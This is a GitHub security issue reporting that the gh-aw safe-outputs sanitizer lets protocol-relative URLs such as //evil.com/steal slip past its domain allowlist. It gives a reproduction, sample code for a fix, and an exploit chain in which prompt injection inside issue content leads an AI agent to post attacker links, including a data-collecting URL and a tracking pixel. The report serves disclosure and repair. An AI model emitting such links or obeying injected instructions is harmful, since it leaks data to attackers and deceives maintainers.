safe-outputs sanitizer must treat //hostname protocol-relative URLs as blocked domains #23737

@szabta89

Summary

The safe-outputs content sanitizer in sanitize_content_core.cjs (v0.64.4) does not match protocol-relative URLs of the form //hostname/path. Both sanitizeUrlProtocols() (which requires an explicit protocol:// prefix) and sanitizeUrlDomains() (which is anchored to https://) miss this form, so //evil.com/steal passes through both filters unmodified. Because GitHub.com is served over HTTPS, a browser resolves //evil.com/steal to https://evil.com/steal, the same destination that sanitizeUrlDomains() correctly blocks when the scheme is written explicitly. This contradicts the documented control that safe-outputs restricts AI-generated content to sanitized, allowlisted URLs.
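The resolution step described above can be checked with the standard WHATWG URL API that ships with Node. This is only an illustration: the base URL is a made-up github.com page, not one taken from the report.

```javascript
// Resolve a protocol-relative reference against an HTTPS page,
// the way a browser does for a link rendered on github.com.
// The base URL below is illustrative only.
const base = "https://github.com/owner/repo/issues/1";
const resolved = new URL("//evil.com/steal", base);

console.log(resolved.href);     // https://evil.com/steal
console.log(resolved.protocol); // https:
console.log(resolved.hostname); // evil.com
```

The reference inherits only the scheme from the base; the host and path come entirely from the protocol-relative string.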

Affected Area

Safe-outputs content sanitization — URL filtering layer (sanitize_content_core.cjs, functions sanitizeUrlProtocols ~line 178 and sanitizeUrlDomains ~line 225).

Reproduction Outline

  1. Configure a gh-aw workflow with safe-outputs: create-issue (or add-comment).
  2. Inject a protocol-relative URL into AI-generated output (e.g., via prompt injection in an issue body): [click here](//attacker.example/collect?r=secret).
  3. The AI includes this link in its safe-output body.
  4. Observe that sanitizeContentCore('[click here](//attacker.example/collect)') returns the input unchanged — the URL is not redacted.
  5. The GitHub API receives and stores the unsanitized link; a viewer clicking it is sent to attacker.example over HTTPS.

Direct verification:

node -e "
process.env.GITHUB_REPOSITORY = 'owner/repo';
const { sanitizeContentCore } = require(process.env.RUNNER_TEMP + '/gh-aw/safeoutputs/sanitize_content_core.cjs');
console.log(sanitizeContentCore('[click](//evil.com/steal)'));
// Expected: [click]((evil.com/redacted))
// Actual:   [click](//evil.com/steal)   ← not redacted
"

Observed Behavior

//evil.com/steal, [Legit link](//evil.com/steal), and ![Track me](//evil.com/pixel.gif) all pass through sanitizeContentCore() unchanged. The explicit form https://evil.com/steal is correctly redacted.
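To illustrate why these inputs slip through, here is a minimal sketch using two hypothetical patterns. They are simplified stand-ins for "requires an explicit protocol:// prefix" and "anchored to https://", and are not the actual regular expressions in sanitize_content_core.cjs.

```javascript
// Hypothetical stand-ins, NOT the patterns used by the real sanitizer.
const explicitProtocol = /\b[a-z][a-z0-9+.-]*:\/\//i; // needs "scheme://"
const httpsAnchored = /https:\/\/([\w.-]+)/i;          // needs a literal "https://"

const samples = [
  "https://evil.com/steal",
  "//evil.com/steal",
  "[Legit link](//evil.com/steal)",
  "![Track me](//evil.com/pixel.gif)",
];

// Record which inputs each pattern would even see.
const results = samples.map((input) => ({
  input,
  matchesProtocol: explicitProtocol.test(input),
  matchesHttps: httpsAnchored.test(input),
}));

console.table(results);
```

Under these assumptions, only the first sample is visible to either pattern; the three protocol-relative forms contain no "scheme://" substring at all, so neither filter has anything to act on.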

Expected Behavior

Protocol-relative URLs (//hostname/path) should be treated equivalently to https://hostname/path by the domain allowlist check. Disallowed domains should be redacted to (hostname/redacted) regardless of whether the scheme is explicit or protocol-relative.

Security Relevance

The exploit chain is: cross-prompt injection payload in issue/PR content → AI includes //attacker.example/... in safe-output body → sanitizer passes it unchanged → GitHub posts the link → maintainer clicks or image auto-loads in their browser, resolving to the attacker's HTTPS server. For image embeds (![](//attacker.example/pixel.gif)), GitHub's camo proxy still reveals to the attacker that the image was requested. This fully bypasses the URL domain allowlist, which is a documented and load-bearing security control.

Suggested fix: Extend sanitizeUrlProtocols to also match //hostname[/path] patterns and apply the same domain allowlist check, or normalize protocol-relative URLs to https:// before the existing sanitizeUrlDomains check. Add a regression test asserting //evil.com/path is treated equivalently to https://evil.com/path.
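A minimal sketch of the second option (normalize, then check the allowlist) might look like the following. Everything here is an assumption made for illustration: ALLOWED_DOMAINS, normalizeProtocolRelative, isAllowed, redactDisallowedDomains, and sanitizeSketch are hypothetical names, and the domain check is a simplified stand-in for sanitizeUrlDomains, not its real implementation. It handles https:// only.

```javascript
// Hypothetical allowlist; the real sanitizer builds its own.
const ALLOWED_DOMAINS = new Set(["github.com"]);

// Rewrite "//host" to "https://host". The lookbehind skips "//" that follows
// ":" (an explicit scheme), "/" (runs of slashes), or a word character
// (a doubled slash inside a path such as "/a//b").
function normalizeProtocolRelative(text) {
  return text.replace(/(?<![:\/\w])\/\/(?=[a-z0-9])/gi, "https://");
}

// Exact match or subdomain of an allowlisted domain.
function isAllowed(host) {
  const h = host.toLowerCase();
  for (const d of ALLOWED_DOMAINS) {
    if (h === d || h.endsWith("." + d)) return true;
  }
  return false;
}

// Simplified stand-in for the domain check: redact disallowed https:// URLs.
function redactDisallowedDomains(text) {
  return text.replace(/https:\/\/([a-z0-9.-]+)[^\s)\]]*/gi, (url, host) =>
    isAllowed(host) ? url : `(${host.toLowerCase()}/redacted)`
  );
}

function sanitizeSketch(text) {
  return redactDisallowedDomains(normalizeProtocolRelative(text));
}

// Regression-style checks: both spellings must end up identical.
console.log(sanitizeSketch("[click](//evil.com/steal)")); // [click]((evil.com/redacted))
console.log(sanitizeSketch("//evil.com/path") === sanitizeSketch("https://evil.com/path")); // true
console.log(sanitizeSketch("//github.com/owner/repo")); // https://github.com/owner/repo
```

One trade-off of normalizing first is that allowlisted protocol-relative links are rewritten to their explicit https:// form in the output. The pattern would also rewrite prose such as a //comment written without a space, so a real fix may need tighter context rules.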

gh-aw version: v0.65.0 (finding reported against v0.64.4)

Original finding: https://github.com/githubnext/gh-aw-security/issues/1646

Generated by File Issue
